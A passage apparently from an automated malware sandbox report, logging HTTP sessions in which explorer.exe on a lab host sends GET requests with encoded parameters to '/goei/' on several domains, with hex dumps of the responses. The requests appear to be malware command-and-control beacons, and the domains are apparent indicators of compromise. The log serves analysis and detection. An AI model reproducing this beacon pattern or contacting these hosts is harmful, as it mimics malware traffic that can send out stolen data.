4e 44 2d 43 4f 4c 4f 52 3a 20 23 66 66 66 3b 20 54 45 58 54 2d 41 4c 49 47 4e 3a 20 63 65 6e 74 65 72 0d 0a 7d 0d 0a 54 44 20 7b 0d 0a 09 46 4f 4e 54 2d 46 41 4d 49 4c 59 3a 20 41 72 69 61 6c 0d 0a 7d 0d 0a 50 20 7b 0d 0a 09 46 4f 4e 54 2d 46 41 4d 49 4c 59 3a 20 41 72 69 61 6c 0d 0a 7d 0d 0a 44 49 56 20 7b 0d 0a 09 46 4f 4e 54 2d 46 41 4d 49 4c 59 3a 20 41 72 69 61 6c 0d 0a 7d 0d 0a 49 4e 50 55 54 20 7b 0d 0a 09 46 4f 4e 54 2d 46 41 4d 49 4c 59 3a 20 41 72 69 61 6c 0d 0a 7d 0d 0a 49 4d 47 20 7b 0d 0a 09 42 4f 52 44 45 52 2d 52 49 47 48 54 3a 20 30 70 78 3b 20 42 4f 52 44 45 52 2d 54 4f 50 3a 20 30 70 78 3b 20 42 4f 52 44 45 52 2d 4c 45 46 54 3a 20 30 70 78 3b 20 42 4f 52 44 45 52 2d 42 4f 54 54 4f 4d 3a 20 30 70 78 0d 0a 7d 0d 0a 54 44 20 7b 0d 0a 09 46 4f 4e 54 2d 53 49 5a 45 3a 20 31 32 70 78 3b 20 4c 49 4e 45 2d 48 45 49 47 48 54 3a 20 31 35 30 25 0d 0a 7d 0d 0a 54 48 20 7b 0d 0a 09 46 4f 4e 54 2d 53 49 5a 45 3a 20 31 32 70 78 3b 20 4c 49 4e 45 2d 48 45 49 47 48 54 3a 20 31 35 30 25 0d 0a 7d 0d 0a 23 66 20 7b 0d 0a 09 4d 41 52 47 49 4e 3a 20 30 70 78 3b 20 50 41 44 44 49 4e 47 2d 54 4f 50 3a 20 34 70 78 0d 0a 7d 0d 0a 23 42 20 7b 0d 0a 09 57 49 44 54 48 3a 20 38 30 30 70 78 0d 0a 7d 0d 0a 2e 68 65 61 64 65 72 20 7b 0d 0a 09 42 4f 52 44 45 52 2d 42 4f 54 54 4f 4d 3a 20 23 62 32 64 30 65 61 20 31 70 78 20 73 6f
                                                                    Data Ascii: 19e3<html> <head> <title>ly-iot.com - The domain is available for purchase</title><meta name="viewport" content="width=device-width, initial-scale=1.0, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no"/><script src="http://libs.baidu.com/jquery/1.9.0/jquery.js"></script><script>$(document).ready(function(){if(window.screen.height<700){$("*").css({"width":"auto","height":"auto","background-image":"none","position":"static"});$("p").css("color","black");$(".stencil-tip").css("line-height","30px");}});</script> <style type="text/css">BODY {FONT-SIZE: 12px; MARGIN: 18px 0px 0px; COLOR: #424242; BACKGROUND-COLOR: #fff; TEXT-ALIGN: center}TD {FONT-FAMILY: Arial}P {FONT-FAMILY: Arial}DIV {FONT-FAMILY: Arial}INPUT {FONT-FAMILY: Arial}IMG {BORDER-RIGHT: 0px; BORDER-TOP: 0px; BORDER-LEFT: 0px; BORDER-BOTTOM: 0px}TD {FONT-SIZE: 12px; LINE-HEIGHT: 150%}TH {FONT-SIZE: 12px; LINE-HEIGHT: 150%}#f {MARGIN: 0px; PADDING-TOP: 4px}#B {WIDTH: 800px}.header {BORDER-BOTTOM: #b2d0ea 1px so


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.6 | 49726 | 104.161.84.100 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Apr 8, 2021 12:46:48.335388899 CEST | 1385 | OUT | GET /goei/?EzuXh6BP=GY2gQUF0Rr/aPbkdLLDyshZLrmGphrTrFvzfodUnQAaoW3qjeuccMn3ranK+t6GyiOOsZqKqHA==&RL0=rVvxj02xpd_lyz HTTP/1.1
                                                                    Host: www.ronwongart.com
                                                                    Connection: close
                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                    Data Ascii:
Apr 8, 2021 12:46:48.497931004 CEST | 1403 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Thu, 08 Apr 2021 10:47:07 GMT
                                                                    Content-Type: text/html; charset=GBK
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Vary: Accept-Encoding
                                                                    Data Raw: 32 33 63 0d 0a 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 34 2e 33 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 23c<html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx/1.4.3</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.6 | 49741 | 198.185.159.144 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Apr 8, 2021 12:46:58.836958885 CEST | 5606 | OUT | GET /goei/?EzuXh6BP=TTuxDc9EejbduYk8ZHEjlKcpN/O2EpBILXUKac8y6lhY4fajDGEqKXEgdN9L03N9MJzUHOy50w==&RL0=rVvxj02xpd_lyz HTTP/1.1
                                                                    Host: www.pimpmyrecipe.com
                                                                    Connection: close
                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                    Data Ascii:
Apr 8, 2021 12:46:58.951539993 CEST | 5609 | IN | HTTP/1.1 400 Bad Request
                                                                    Cache-Control: no-cache, must-revalidate
                                                                    Content-Length: 77564
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Date: Thu, 08 Apr 2021 10:46:58 UTC
                                                                    Expires: Thu, 01 Jan 1970 00:00:00 UTC
                                                                    Pragma: no-cache
                                                                    Server: Squarespace
                                                                    X-Contextid: rofEdlC9/lBVebWxJ
                                                                    Connection: close
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 39 35 76 77 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 2e 36 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 39 31 39 31 39 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 31 70 78 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 34 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 61 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 
20 73 6f 6c 69 64 20 31 70 78 20 23 33 61 33 61 33 61 3b 0a 20 20 7d 0a 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 43 6c 61 72 6b 73 6f 6e 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 7d 0a 0a 20 20 23 73 74 61 74 75 73 2d 70 61 67 65 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 32 32 70 78 3b 0a 20 20 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 73 70 61 6e 20 7b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 31 31 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 65 6d 3b 0a 20 20 20 20
                                                                    Data Ascii: <!DOCTYPE html><head> <title>400 Bad Request</title> <meta name="viewport" content="width=device-width, initial-scale=1"> <style type="text/css"> body { background: white; } main { position: absolute; top: 50%; left: 50%; transform: translate(-50%, -50%); text-align: center; min-width: 95vw; } main h1 { font-weight: 300; font-size: 4.6em; color: #191919; margin: 0 0 11px 0; } main p { font-size: 1.4em; color: #3a3a3a; font-weight: 300; line-height: 2em; margin: 0; } main p a { color: #3a3a3a; text-decoration: none; border-bottom: solid 1px #3a3a3a; } body { font-family: "Clarkson", sans-serif; font-size: 12px; } #status-page { display: none; } footer { position: absolute; bottom: 22px; left: 0; width: 100%; text-align: center; line-height: 2em; } footer span { margin: 0 11px; font-size: 1em;


                                                                    Session ID: 3  Source: 192.168.2.6:49742  Destination: 34.102.136.180:80  Process: C:\Windows\explorer.exe
                                                                    Timestamp: Apr 8, 2021 12:47:09.092782021 CEST  kBytes transferred: 6398  Direction: OUT
                                                                    Data: GET /goei/?EzuXh6BP=BdWs9+XwUamw8CUuz3E8yrboev7iCL3gb6z7OkS86X4CeTXY3ejv3dXKop2WOnP3DDbLLyGv2A==&RL0=rVvxj02xpd_lyz HTTP/1.1
                                                                    Host: www.foodsystemsjusticeproject.com
                                                                    Connection: close
                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                    Data Ascii:
                                                                    Timestamp: Apr 8, 2021 12:47:09.209527016 CEST  kBytes transferred: 6398  Direction: IN
                                                                    Data: HTTP/1.1 403 Forbidden
                                                                    Server: openresty
                                                                    Date: Thu, 08 Apr 2021 10:47:09 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 275
                                                                    ETag: "606abe1d-113"
                                                                    Via: 1.1 google
                                                                    Connection: close
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                    Session ID: 4  Source: 192.168.2.6:49743  Destination: 193.168.194.206:80  Process: C:\Windows\explorer.exe
                                                                    Timestamp: Apr 8, 2021 12:47:17.752739906 CEST  kBytes transferred: 6399  Direction: OUT
                                                                    Data: GET /goei/?EzuXh6BP=iESvN3vx+46BgVwWtoPvPQmUnTMTtp1hHS9L6erIUoS4dJlpb0oL7GpX49j9BG002Zkja/L0IA==&RL0=rVvxj02xpd_lyz HTTP/1.1
                                                                    Host: www.batiktintaemas.com
                                                                    Connection: close
                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                    Data Ascii:
                                                                    Timestamp: Apr 8, 2021 12:47:24.087763071 CEST  kBytes transferred: 6409  Direction: IN
                                                                    Data: HTTP/1.1 301 Moved Permanently
                                                                    Connection: close
                                                                    X-Powered-By: PHP/7.2.34
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                    Cache-Control: no-cache, must-revalidate, max-age=0
                                                                    X-Redirect-By: WordPress
                                                                    Location: http://batiktintaemas.com/goei/?EzuXh6BP=iESvN3vx+46BgVwWtoPvPQmUnTMTtp1hHS9L6erIUoS4dJlpb0oL7GpX49j9BG002Zkja/L0IA==&RL0=rVvxj02xpd_lyz
                                                                    Content-Length: 0
                                                                    Date: Thu, 08 Apr 2021 10:47:23 GMT
                                                                    Server: LiteSpeed
                                                                    Vary: User-Agent


                                                                    Session ID: 5  Source: 192.168.2.6:49749  Destination: 199.59.242.153:80  Process: C:\Windows\explorer.exe
                                                                    Timestamp: Apr 8, 2021 12:47:33.692498922 CEST  kBytes transferred: 6429  Direction: OUT
                                                                    Data: GET /goei/?EzuXh6BP=WHzdRAWCNmljEZUdYknMeV5zI3m+uLt35kXWxc+UN/aPGTi9DTFvtLFMQ5OC8xESdqE/mkifJw==&RL0=rVvxj02xpd_lyz HTTP/1.1
                                                                    Host: www.addthat.xyz
                                                                    Connection: close
                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                    Data Ascii:
                                                                    Timestamp: Apr 8, 2021 12:47:33.802937031 CEST  kBytes transferred: 6430  Direction: IN
                                                                    Data: HTTP/1.1 200 OK
                                                                    Server: openresty
                                                                    Date: Thu, 08 Apr 2021 10:47:33 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_a7msil34EyaoVjODEDUQ2ff4sUDhxeCYFMDh2tCvLxODdKADG02BsrkHtQfUPBUVH5YKtKdN4CUGklYGwKwPLA==
                                                                    Data Raw: 65 65 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 61 37 6d 73 69 6c 33 34 45 79 61 6f 56 6a 4f 44 45 44 55 51 32 66 66 34 73 55 44 68 78 65 43 59 46 4d 44 68 32 74 43 76 4c 78 4f 44 64 4b 41 44 47 30 32 42 73 72 6b 48 74 51 66 55 50 42 55 56 48 35 59 4b 74 4b 64 4e 34 43 55 47 6b 6c 59 47 77 4b 77 50 4c 41 3d 3d 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 65 20 72 65 6c 61 74 65 64 20 6c 69 6e 6b 73 20 74 6f 20 77 68 61 74 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 2e 22 2f 3e 3c 2f 68 65 61 64 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 36 20 5d 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 69 65 36 22 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 37 20 5d 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 69 65 37 22 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 38 20 5d 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 69 65 38 22 3e 3c 21 5b 65 6e 64 69 66 5d 
2d 2d 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 39 20 5d 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 69 65 39 22 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 28 67 74 20 49 45 20 39 29 7c 21 28 49 45 29 5d 3e 20 2d 2d 3e 3c 62 6f 64 79 3e 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 67 5f 70 62 3d 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 0a 44 54 3d 64 6f 63 75 6d 65 6e 74 2c 61 7a 78 3d 6c 6f 63 61 74 69 6f 6e 2c 44 44 3d 44 54 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 2c 61 41 43 3d 66 61 6c 73 65 2c 4c 55 3b 44 44 2e 64 65 66 65 72 3d 74 72 75 65 3b 44 44 2e 61 73 79 6e 63 3d 74 72 75 65 3b 44 44 2e 73 72 63 3d 22 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 64 73 65 6e 73 65 2f 64 6f 6d 61 69 6e 73 2f 63 61 66 2e 6a 73 22 3b 44 44 2e 6f 6e 65
                                                                    Data Ascii: ee4<!DOCTYPE html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_a7msil34EyaoVjODEDUQ2ff4sUDhxeCYFMDh2tCvLxODdKADG02BsrkHtQfUPBUVH5YKtKdN4CUGklYGwKwPLA=="><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title></title><meta name="viewport" content="width=device-width, initial-scale=1"><meta name="description" content="See related links to what you are looking for."/></head>...[if IE 6 ]><body class="ie6"><![endif]-->...[if IE 7 ]><body class="ie7"><![endif]-->...[if IE 8 ]><body class="ie8"><![endif]-->...[if IE 9 ]><body class="ie9"><![endif]-->...[if (gt IE 9)|!(IE)]> --><body>...<![endif]--><script type="text/javascript">g_pb=(function(){varDT=document,azx=location,DD=DT.createElement('script'),aAC=false,LU;DD.defer=true;DD.async=true;DD.src="//www.google.com/adsense/domains/caf.js";DD.one


                                                                    Session ID: 6  Source: 192.168.2.6:49750  Destination: 85.159.66.93:80  Process: C:\Windows\explorer.exe
                                                                    Timestamp: Apr 8, 2021 12:47:38.938357115 CEST  kBytes transferred: 6435  Direction: OUT
                                                                    Data: GET /goei/?EzuXh6BP=1hbvBZ6scGrlPy0N1riO1jCdFmqX21DbBNOeXEZPJTZAL1bLTprMXMNvQ4/+FZIG6w0HvwIWjw==&RL0=rVvxj02xpd_lyz HTTP/1.1
                                                                    Host: www.evecrude.xyz
                                                                    Connection: close
                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                    Data Ascii:
                                                                    Timestamp: Apr 8, 2021 12:47:38.990061045 CEST  kBytes transferred: 6436  Direction: IN
                                                                    Data: HTTP/1.1 404 Not Found
                                                                    Content-Type: text/html
                                                                    Server: Microsoft-IIS/10.0
                                                                    X-Powered-By: ASP.NET
                                                                    Date: Thu, 08 Apr 2021 10:47:16 GMT
                                                                    Connection: close
                                                                    Content-Length: 1245
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 
